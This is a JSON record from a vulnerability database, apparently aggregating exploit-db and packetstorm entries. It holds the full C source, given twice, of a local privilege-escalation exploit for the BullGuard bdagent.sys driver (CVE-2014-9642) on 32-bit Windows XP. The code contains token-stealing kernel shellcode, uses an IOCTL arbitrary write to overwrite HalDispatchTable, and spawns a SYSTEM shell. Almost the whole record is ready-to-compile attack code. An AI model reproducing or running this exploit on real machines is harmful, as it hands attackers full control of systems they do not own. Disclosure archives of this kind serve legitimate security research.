_SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(\r\n SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n PVOID SystemInformation,\r\n ULONG SystemInformationLength,\r\n PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(\r\n DWORD ProfileSource, \r\n PULONG Interval);\r\n\r\ntypedef void (*FUNCTPTR)(); \r\n\r\n\r\n\r\n// Windows XP SP3\r\n\r\n#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct\r\n#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct\r\n#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct\r\n#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct\r\n\r\n\r\nBYTE token_steal_xp[] =\r\n{\r\n 0x52, // push edx Save edx on the stack\r\n 0x53,\t // push ebx Save ebx on the stack\r\n 0x33,0xc0, // xor eax, eax eax = 0\r\n 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD\r\n 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS\r\n 0x8b,0xc8, // mov ecx, eax\r\n 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN\r\n 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks\r\n 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)\r\n 0x75,0xe8, // jne ---- \r\n 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX\r\n 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX\r\n 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS\r\n 0x5b, // pop ebx Restores ebx\r\n 0x5a, // pop edx Restores edx\r\n 0xc2,0x08 // ret 8 Away from the kernel \r\n};\r\n\r\n\r\n\r\nBYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable\r\n\"\\xf2\\xa3\\x6f\\x80\" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation\r\n\"\\xce\\xa3\\x6f\\x80\" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation\r\n\"\\x0b\\x46\\x61\\x80\" // 8054ccc4 8061460b nt!xHalQueryBusSlots\r\n\"\\x00\\x00\\x00\\x00\" // 8054ccc8 00000000\r\n\"\\x4d\\xac\\x50\\x80\" // 8054cccc 8050ac4d nt!HalExamineMBR\r\n\"\\x89\\x6f\\x5c\\x80\" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters\r\n\"\\xe5\\x4a\\x5c\\x80\"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable\r\n\r\n\r\n\r\nDWORD HalDispatchTableAddress() \r\n{\r\n _NtQuerySystemInformation NtQuerySystemInformation;\r\n PSYSTEM_MODULE_INFORMATION pModuleInfo;\r\n DWORD HalDispatchTable;\r\n CHAR kFullName[256];\r\n PVOID kBase = NULL;\r\n LPSTR kName;\r\n HMODULE Kernel;\r\n FUNCTPTR Hal;\r\n ULONG len;\r\n NTSTATUS status;\r\n\r\n\r\n NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQuerySystemInformation\");\r\n \t\r\n if (!NtQuerySystemInformation)\r\n {\r\n printf(\"[-] Unable to resolve NtQuerySystemInformation\\n\\n\");\r\n return -1; \r\n }\r\n\r\n status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);\r\n\r\n if (!status) \r\n {\r\n printf(\"[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\\n\\n\", status);\r\n return -1;\r\n }\r\n\t\t\r\n pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);\r\n\r\n if(pModuleInfo == NULL)\r\n {\r\n printf(\"[-] An error occurred with GlobalAlloc for pModuleInfo\\n\\n\");\r\n return -1;\r\n }\r\n\r\n status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);\r\n\t\r\n memset(kFullName, 0x00, sizeof(kFullName));\r\n strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);\r\n kBase = pModuleInfo->Module[0].Base;\r\n\r\n printf(\"[i] Kernel base name %s\\n\", kFullName);\r\n kName = strrchr(kFullName, '\\\\');\r\n\r\n Kernel = LoadLibraryA(++kName);\r\n\r\n if(Kernel == NULL) \r\n {\r\n printf(\"[-] Failed to load kernel base\\n\\n\");\r\n return -1;\r\n }\r\n\r\n Hal = (FUNCTPTR)GetProcAddress(Kernel, \"HalDispatchTable\");\r\n\r\n if(Hal == NULL)\r\n {\r\n printf(\"[-] Failed to find HalDispatchTable\\n\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"[i] HalDispatchTable address 0x%08x\\n\", Hal);\t\r\n printf(\"[i] Kernel handle 0x%08x\\n\", Kernel);\r\n printf(\"[i] Kernel base address 0x%08x\\n\", kBase); \r\n\r\n HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);\r\n\r\n printf(\"[+] Kernel address of HalDispatchTable 0x%08x\\n\", HalDispatchTable);\r\n\r\n if(!HalDispatchTable)\r\n {\r\n printf(\"[-] Failed to calculate HalDispatchTable\\n\\n\");\r\n\treturn -1;\r\n }\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\n\r\nint GetWindowsVersion()\r\n{\r\n int v = 0;\r\n DWORD version = 0, minVersion = 0, majVersion = 0;\r\n\r\n version = GetVersion();\r\n\r\n minVersion = (DWORD)(HIBYTE(LOWORD(version)));\r\n majVersion = (DWORD)(LOBYTE(LOWORD(version)));\r\n\r\n if (minVersion == 1 && majVersion == 5) v = 1; // \"Windows XP;\r\n if (minVersion == 1 && majVersion == 6) v = 2; // \"Windows 7\";\r\n if (minVersion == 2 && majVersion == 5) v = 3; // \"Windows Server 2003;\r\n\r\n return v;\r\n}\r\n\r\n\r\nvoid spawnShell()\r\n{\r\n STARTUPINFOA si;\r\n PROCESS_INFORMATION pi;\r\n\r\n\r\n ZeroMemory(&pi, sizeof(pi));\r\n ZeroMemory(&si, sizeof(si));\r\n si.cb = sizeof(si);\r\n\r\n si.cb = sizeof(si); \r\n si.dwFlags = STARTF_USESHOWWINDOW;\r\n si.wShowWindow = SW_SHOWNORMAL;\r\n\r\n if (!CreateProcess(NULL, \"cmd.exe\", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))\r\n {\r\n printf(\"\\n[-] CreateProcess failed (%d)\\n\\n\", GetLastError());\r\n return;\r\n }\r\n\r\n CloseHandle(pi.hThread);\r\n CloseHandle(pi.hProcess);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[]) \r\n{\r\n\r\n _NtQueryIntervalProfile NtQueryIntervalProfile;\r\n LPVOID input[1] = {0}; \r\n LPVOID addrtoshell;\r\n HANDLE hDevice;\r\n DWORD dwRetBytes = 0;\r\n DWORD HalDispatchTableTarget; \r\n ULONG time = 0;\r\n unsigned char devhandle[MAX_PATH]; \r\n\r\n\r\n printf(\"-------------------------------------------------------------------------------\\n\");\r\n printf(\" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \\n\");\r\n printf(\" Tested on Windows XP SP3 (32bit) \\n\");\r\n printf(\"-------------------------------------------------------------------------------\\n\\n\");\r\n\r\n if (GetWindowsVersion() == 1) \r\n {\r\n printf(\"[i] Running Windows XP\\n\");\r\n }\r\n\r\n if (GetWindowsVersion() == 0) \r\n {\r\n printf(\"[i] Exploit not supported on this OS\\n\\n\");\r\n return -1;\r\n } \r\n\r\n sprintf(devhandle, \"\\\\\\\\.\\\\%s\", \"bdagent\");\r\n\r\n NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryIntervalProfile\");\r\n \t\r\n if (!NtQueryIntervalProfile)\r\n {\r\n printf(\"[-] Unable to resolve NtQueryIntervalProfile\\n\\n\");\r\n return -1; \r\n }\r\n \r\n addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n\r\n if(addrtoshell == NULL)\r\n {\r\n printf(\"[-] VirtualAlloc allocation failure %.8x\\n\\n\", GetLastError());\r\n return -1;\r\n }\r\n printf(\"[+] VirtualAlloc allocated memory at 0x%.8x\\n\", addrtoshell);\r\n\r\n memset(addrtoshell, 0x90, BUFSIZE);\r\n memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));\r\n printf(\"[i] Size of shellcode %d bytes\\n\", sizeof(token_steal_xp));\r\n\r\n hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);\r\n \r\n if (hDevice == INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"[-] CreateFile open %s device failed (%d)\\n\\n\", devhandle, GetLastError());\r\n return -1;\r\n }\r\n else \r\n {\r\n printf(\"[+] Open %s device successful\\n\", devhandle);\r\n }\r\n\r\n HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);\r\n printf(\"[+] HalDispatchTable+4 (0x%08x) will be overwritten\\n\", HalDispatchTableTarget);\r\n\r\n input[0] = addrtoshell; // input buffer contents gets written to our output buffer address\r\n \r\n printf(\"[+] Input buffer contents %08x\\n\", input[0]);\r\n \t\r\n printf(\"[~] Press any key to send Exploit . . .\\n\");\r\n getch();\r\n\r\n DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n\r\n printf(\"[+] Buffer sent\\n\");\r\n\r\n printf(\"[+] Spawning SYSTEM Shell\\n\");\r\n NtQueryIntervalProfile(2, &time);\r\n spawnShell();\r\n\r\n printf(\"[+] Restoring Hal dispatch table pointers\\n\\n\");\r\n\r\n DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n\r\n CloseHandle(hDevice);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35994/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:34", "bulletinFamily": "exploit", "description": "", "modified": "2015-02-05T00:00:00", "published": "2015-02-05T00:00:00", "href": "https://packetstormsecurity.com/files/130247/BullGuard-14.1.285.4-Privilege-Escalation.html", "id": "PACKETSTORM:130247", "title": "BullGuard 14.1.285.4 Privilege Escalation", "type": "packetstorm", "sourceData": "`/* \n \nExploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation \nDate - 04th February 2015 \nDiscovered by - Parvez Anwar (@parvezghh) \nVendor Homepage - http://www.bullguard.com/ \nTested Version - 14.1.285.4 \nDriver Version - 1.0.0.6 - BdAgent.sys \nTested on OS - 32bit Windows XP SP3 \nOSVDB - http://www.osvdb.org/show/osvdb/114478 \nCVE ID - CVE-2014-9642 \nVendor fix url - http://www.bullguard.com/about/release-notes.aspx \nFixed Version - 15.0.288.1 \nFixed driver ver - 1.0.0.7 \n \n \n \nNote \n---- \nOverwritten HAL dispatch table after exploit \n \nkd> dps nt!HalDispatchTable l c \n8054ccb8 00000003 \n8054ccbc 00340000 \n8054ccc0 00010000 \n8054ccc4 0a060002 \n8054ccc8 ee657645 \n8054cccc 00000001 \n8054ccd0 00000001 \n8054ccd4 867c1bf0 \n8054ccd8 80613f7b nt!IoSetPartitionInformation \n8054ccdc 806141ef nt!IoWritePartitionTable \n8054cce0 8052d157 nt!CcHasInactiveViews \n8054cce4 804e42d1 nt!ObpTraceDepth+0x19 \n \n7 pointers get overwritten. Since input buffer is in our control and pointers \nare static in XP I've triggered the overwrite again restoring the pointers. \n \n*/ \n \n \n#include <stdio.h> \n#include <windows.h> \n \n#define BUFSIZE 4096 \n \n \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; \nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( \nSYSTEM_INFORMATION_CLASS SystemInformationClass, \nPVOID SystemInformation, \nULONG SystemInformationLength, \nPULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( \nDWORD ProfileSource, \nPULONG Interval); \n \ntypedef void (*FUNCTPTR)(); \n \n \n \n// Windows XP SP3 \n \n#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct \n#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct \n#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct \n#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct \n \n \nBYTE token_steal_xp[] = \n{ \n0x52, // push edx Save edx on the stack \n0x53, // push ebx Save ebx on the stack \n0x33,0xc0, // xor eax, eax eax = 0 \n0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD \n0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS \n0x8b,0xc8, // mov ecx, eax \n0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN \n0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks \n0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks \n0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) \n0x75,0xe8, // jne ---- \n0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX \n0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX \n0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS \n0x5b, // pop ebx Restores ebx \n0x5a, // pop edx Restores edx \n0xc2,0x08 // ret 8 Away from the kernel \n}; \n \n \n \nBYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable \n\"\\xf2\\xa3\\x6f\\x80\" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation \n\"\\xce\\xa3\\x6f\\x80\" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation \n\"\\x0b\\x46\\x61\\x80\" // 8054ccc4 8061460b nt!xHalQueryBusSlots \n\"\\x00\\x00\\x00\\x00\" // 8054ccc8 00000000 \n\"\\x4d\\xac\\x50\\x80\" // 8054cccc 8050ac4d nt!HalExamineMBR \n\"\\x89\\x6f\\x5c\\x80\" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters \n\"\\xe5\\x4a\\x5c\\x80\"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable \n \n \n \nDWORD HalDispatchTableAddress() \n{ \n_NtQuerySystemInformation NtQuerySystemInformation; \nPSYSTEM_MODULE_INFORMATION pModuleInfo; \nDWORD HalDispatchTable; \nCHAR kFullName[256]; \nPVOID kBase = NULL; \nLPSTR kName; \nHMODULE Kernel; \nFUNCTPTR Hal; \nULONG len; \nNTSTATUS status; \n \n \nNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) \n{ \nprintf(\"[-] Unable to resolve NtQuerySystemInformation\\n\\n\"); \nreturn -1; \n} \n \nstatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); \n \nif (!status) \n{ \nprintf(\"[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\\n\\n\", status); \nreturn -1; \n} \n \npModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); \n \nif(pModuleInfo == NULL) \n{ \nprintf(\"[-] An error occurred with GlobalAlloc for pModuleInfo\\n\\n\"); \nreturn -1; \n} \n \nstatus = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); \n \nmemset(kFullName, 0x00, sizeof(kFullName)); \nstrcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); \nkBase = pModuleInfo->Module[0].Base; \n \nprintf(\"[i] Kernel base name %s\\n\", kFullName); \nkName = strrchr(kFullName, '\\\\'); \n \nKernel = LoadLibraryA(++kName); \n \nif(Kernel == NULL) \n{ \nprintf(\"[-] Failed to load kernel base\\n\\n\"); \nreturn -1; \n} \n \nHal = (FUNCTPTR)GetProcAddress(Kernel, \"HalDispatchTable\"); \n \nif(Hal == NULL) \n{ \nprintf(\"[-] Failed to find HalDispatchTable\\n\\n\"); \nreturn -1; \n} \n \nprintf(\"[i] HalDispatchTable address 0x%08x\\n\", Hal); \nprintf(\"[i] Kernel handle 0x%08x\\n\", Kernel); \nprintf(\"[i] Kernel base address 0x%08x\\n\", kBase); \n \nHalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); \n \nprintf(\"[+] Kernel address of HalDispatchTable 0x%08x\\n\", HalDispatchTable); \n \nif(!HalDispatchTable) \n{ \nprintf(\"[-] Failed to calculate HalDispatchTable\\n\\n\"); \nreturn -1; \n} \n \nreturn HalDispatchTable; \n} \n \n \nint GetWindowsVersion() \n{ \nint v = 0; \nDWORD version = 0, minVersion = 0, majVersion = 0; \n \nversion = GetVersion(); \n \nminVersion = (DWORD)(HIBYTE(LOWORD(version))); \nmajVersion = (DWORD)(LOBYTE(LOWORD(version))); \n \nif (minVersion == 1 && majVersion == 5) v = 1; // \"Windows XP; \nif (minVersion == 1 && majVersion == 6) v = 2; // \"Windows 7\"; \nif (minVersion == 2 && majVersion == 5) v = 3; // \"Windows Server 2003; \n \nreturn v; \n} \n \n \nvoid spawnShell() \n{ \nSTARTUPINFOA si; \nPROCESS_INFORMATION pi; \n \n \nZeroMemory(&pi, sizeof(pi)); \nZeroMemory(&si, sizeof(si)); \nsi.cb = sizeof(si); \n \nsi.cb = sizeof(si); \nsi.dwFlags = STARTF_USESHOWWINDOW; \nsi.wShowWindow = SW_SHOWNORMAL; \n \nif (!CreateProcess(NULL, \"cmd.exe\", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) \n{ \nprintf(\"\\n[-] CreateProcess failed (%d)\\n\\n\", GetLastError()); \nreturn; \n} \n \nCloseHandle(pi.hThread); \nCloseHandle(pi.hProcess); \n} \n \n \nint main(int argc, char *argv[]) \n{ \n \n_NtQueryIntervalProfile NtQueryIntervalProfile; \nLPVOID input[1] = {0}; \nLPVOID addrtoshell; \nHANDLE hDevice; \nDWORD dwRetBytes = 0; \nDWORD HalDispatchTableTarget; \nULONG time = 0; \nunsigned char devhandle[MAX_PATH]; \n \n \nprintf(\"-------------------------------------------------------------------------------\\n\"); \nprintf(\" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \\n\"); \nprintf(\" Tested on Windows XP SP3 (32bit) \\n\"); \nprintf(\"-------------------------------------------------------------------------------\\n\\n\"); \n \nif (GetWindowsVersion() == 1) \n{ \nprintf(\"[i] Running Windows XP\\n\"); \n} \n \nif (GetWindowsVersion() == 0) \n{ \nprintf(\"[i] Exploit not supported on this OS\\n\\n\"); \nreturn -1; \n} \n \nsprintf(devhandle, \"\\\\\\\\.\\\\%s\", \"bdagent\"); \n \nNtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) \n{ \nprintf(\"[-] Unable to resolve NtQueryIntervalProfile\\n\\n\"); \nreturn -1; \n} \n \naddrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); \n \nif(addrtoshell == NULL) \n{ \nprintf(\"[-] VirtualAlloc allocation failure %.8x\\n\\n\", GetLastError()); \nreturn -1; \n} \nprintf(\"[+] VirtualAlloc allocated memory at 0x%.8x\\n\", addrtoshell); \n \nmemset(addrtoshell, 0x90, BUFSIZE); \nmemcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); \nprintf(\"[i] Size of shellcode %d bytes\\n\", sizeof(token_steal_xp)); \n \nhDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); \n \nif (hDevice == INVALID_HANDLE_VALUE) \n{ \nprintf(\"[-] CreateFile open %s device failed (%d)\\n\\n\", devhandle, GetLastError()); \nreturn -1; \n} \nelse \n{ \nprintf(\"[+] Open %s device successful\\n\", devhandle); \n} \n \nHalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); \nprintf(\"[+] HalDispatchTable+4 (0x%08x) will be overwritten\\n\", HalDispatchTableTarget); \n \ninput[0] = addrtoshell; // input buffer contents gets written to our output buffer address \n \nprintf(\"[+] Input buffer contents %08x\\n\", input[0]); \n \nprintf(\"[~] Press any key to send Exploit . . .\\n\"); \ngetch(); \n \nDeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); \n \nprintf(\"[+] Buffer sent\\n\"); \n \nprintf(\"[+] Spawning SYSTEM Shell\\n\"); \nNtQueryIntervalProfile(2, &time); \nspawnShell(); \n \nprintf(\"[+] Restoring Hal dispatch table pointers\\n\\n\"); \n \nDeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); \n \nCloseHandle(hDevice); \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130247/bullguard-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
